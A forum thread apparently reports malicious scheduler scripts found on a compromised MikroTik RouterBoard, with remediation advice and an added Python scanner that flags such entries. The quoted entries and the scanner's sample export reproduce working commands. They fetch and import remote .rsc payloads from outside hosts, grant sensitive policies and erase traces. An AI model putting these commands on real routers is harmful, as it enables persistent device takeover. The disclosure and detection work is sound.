Suspect script found

Hi!

Today I connected to a WISP client's equipment and found these scripts in a RouterBoard:

The user accounts were changed with the comment "A mih by prosto vydalyty" and two IP address classes were added: 87.246.0.0/16 and 152.237.0.0/16.
/system scheduler
add disabled=yes name=upd112 on-event=":delay 1m\r\n:do {/tool fetch url="https://2no.co/184M37\" mode=http keep-result=no} on-error={}\r\n/system scheduler remove [find name=sh113]\r\n:do {/file remove u113.rsc} on-error={}" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add disabled=yes interval=12h name=upd113 on-event=":do {/tool fetch url="http://up0.bit:31415/error?part=9" mode=http dst-path=webproxy/error.html} on-error={}\r\n:do {/tool fetch url="http://up0.bit:31415/error\?part=9\" mode=http dst-path=flash/webproxy/error.html} on-error={}\r\n:do {/tool fetch url="http://up0.bit:31415/rsc\?key=9MLcyZzstYRjAa&part=9\" mode=http dst-path=u113.rsc} on-error={}\r\n:do {/tool fetch url=https://2no.co/184M37 mode=http keep-result=no} on-error={}\r\n/import u113.rsc\r\n:do {/file remove u113.rsc} on-error={}" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=sep/22/2018 start-time=08:06:13
add disabled=yes interval=1d name=Auto113 on-event="/system scheduler remove [find name=upd111]\r\n/system reboot" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=sep/22/2018 start-time=03:11:00
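Scheduler entries like the ones quoted above are what a defender wants to pick out of a RouterOS `/export` automatically rather than by eye: a scheduled `/tool fetch` from an outside host, an `/import` of the downloaded `.rsc`, cleanup of the evidence, and a policy list that includes `password`, `policy` and `sensitive`. The scanner below is an added example, not code from the post or from MikroTik. It joins the backslash-continued lines of the standard export format, parses each `add` line in the `/system scheduler` section, unescapes the `on-event` string and scores it against those indicators. The sample export is constructed here from the entries quoted above (continuation backslashes restored, one entry shortened) plus a benign `backup` entry for contrast; the indicator weights and the threshold are my own assumptions, not anything the post defines.

```python
"""Flag suspicious /system scheduler entries in a RouterOS /export.

Added example, not from the forum post. Assumes the standard export
layout: long lines wrapped with a trailing backslash, continuation lines
indented, quoted values escaped with backslashes (\" \r \n \?).
"""
import re
from dataclasses import dataclass

# Constructed sample modelled on the scheduler entries quoted in the post,
# with a harmless daily backup job added for contrast.
SAMPLE_EXPORT = r'''/system scheduler
add disabled=yes name=upd112 on-event=":delay 1m\r\
    \n:do {/tool fetch url=\"https://2no.co/184M37\" mode=http keep-result=no} o\
    n-error={}\r\
    \n/system scheduler remove [find name=sh113]\r\
    \n:do {/file remove u113.rsc} on-error={}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
add interval=1d name=backup on-event="/system backup save name=daily" policy=\
    read,write start-time=02:00:00
add disabled=yes interval=12h name=upd113 on-event=":do {/tool fetch url=\"http:\
    //up0.bit:31415/rsc\?key=9MLcyZzstYRjAa&part=9\" mode=http dst-path=u113.rsc} on-error={}\r\
    \n/import u113.rsc\r\
    \n:do {/file remove u113.rsc} on-error={}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    sep/22/2018 start-time=08:06:13
'''

# Indicator tag, regex over the unescaped script, and an assumed weight.
INDICATORS = [
    ("fetch", re.compile(r"/tool fetch\b"), 3),         # downloads from outside
    ("import", re.compile(r"/import\b"), 3),            # executes a downloaded .rsc
    ("self-clean", re.compile(r"/system scheduler remove\b|/file remove\b"), 2),
    ("reboot", re.compile(r"/system reboot\b"), 2),
]
RISKY_POLICIES = {"policy", "password", "sensitive", "ftp", "sniff"}  # weight 1 each
URL_RE = re.compile(r'url=(?:"([^"]*)"|(\S+))')
THRESHOLD = 3  # assumed: any fetch or import alone is enough to flag


def join_continuations(text):
    """Undo the export's line wrapping: a trailing backslash continues the
    line, and the continuation's leading indentation is not part of the value."""
    joined, pending = [], None
    for raw in text.splitlines():
        part = raw.lstrip() if pending is not None else raw
        if part.endswith("\\"):
            pending = (pending or "") + part[:-1]
        else:
            joined.append((pending or "") + part)
            pending = None
    if pending is not None:
        joined.append(pending)
    return joined


def parse_quoted(s, start):
    """Read a double-quoted RouterOS value beginning at s[start] == '"'.
    Returns (unescaped value, index just past the closing quote)."""
    out, i = [], start + 1
    while i < len(s):
        c = s[i]
        if c == "\\" and i + 1 < len(s):
            nxt = s[i + 1]
            out.append({"r": "\r", "n": "\n"}.get(nxt, nxt))  # \" \? \\ -> literal
            i += 2
            continue
        if c == '"':
            return "".join(out), i + 1
        out.append(c)
        i += 1
    raise ValueError("unterminated quoted value")


def parse_add(line):
    """Split an 'add key=value ...' line into a dict; values may be quoted."""
    props, i, n = {}, 4, len(line)
    while i < n:
        if line[i] == " ":
            i += 1
            continue
        eq = line.find("=", i)
        if eq == -1:
            break
        key = line[i:eq]
        if eq + 1 < n and line[eq + 1] == '"':
            val, i = parse_quoted(line, eq + 1)
        else:
            end = line.find(" ", eq + 1)
            end = n if end == -1 else end
            val, i = line[eq + 1:end], end
        props[key] = val
    return props


@dataclass
class Finding:
    name: str
    indicators: list   # tags from INDICATORS that matched
    urls: list         # every url= argument seen in the script
    policies: list     # risky policy names granted to the job
    score: int


def scan_export(text):
    """Return one Finding per scheduler entry, in export order."""
    findings, in_scheduler = [], False
    for line in join_continuations(text):
        if line.startswith("/"):
            in_scheduler = line.strip() == "/system scheduler"
            continue
        if not in_scheduler or not line.startswith("add "):
            continue
        props = parse_add(line)
        script = props.get("on-event", "")
        hits = [(tag, w) for tag, rx, w in INDICATORS if rx.search(script)]
        urls = [a or b for a, b in URL_RE.findall(script)]
        policies = sorted(RISKY_POLICIES & set(props.get("policy", "").split(",")))
        score = sum(w for _, w in hits) + len(policies)
        findings.append(Finding(props.get("name", "?"), [t for t, _ in hits], urls, policies, score))
    return findings


def suspicious_names(text):
    return [f.name for f in scan_export(text) if f.score >= THRESHOLD]


if __name__ == "__main__":
    for f in scan_export(SAMPLE_EXPORT):
        flag = "SUSPICIOUS" if f.score >= THRESHOLD else "ok"
        print(f"{f.name:10} {flag:10} score={f.score} {f.indicators} {f.urls}")
```

Run it against `/export` output saved from the device (or from a backup taken before reinstalling) and review every flagged entry's URLs and policy list; a legitimate job rarely needs `password`, `policy` or `sensitive`. The same unescaping is useful for reading `/import`-ed `.rsc` payloads, which the post notes is where the real activity happens.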

Do a netinstall with the latest version, use a known good config and change all passwords.

The script pointed to a u113.rsc that was in /file, and to an sh113 schedule and an upd111 schedule that also seem to have been removed…

The real "bad" stuff happens inside those scripts…

Do a netinstall on that device with all user passwords changed and double-check your input rules.

Thank you guys.

I've posted it all here to alert other people to stay alert.

We swapped the equipment, and took this to the workbench to reinstall the firmware.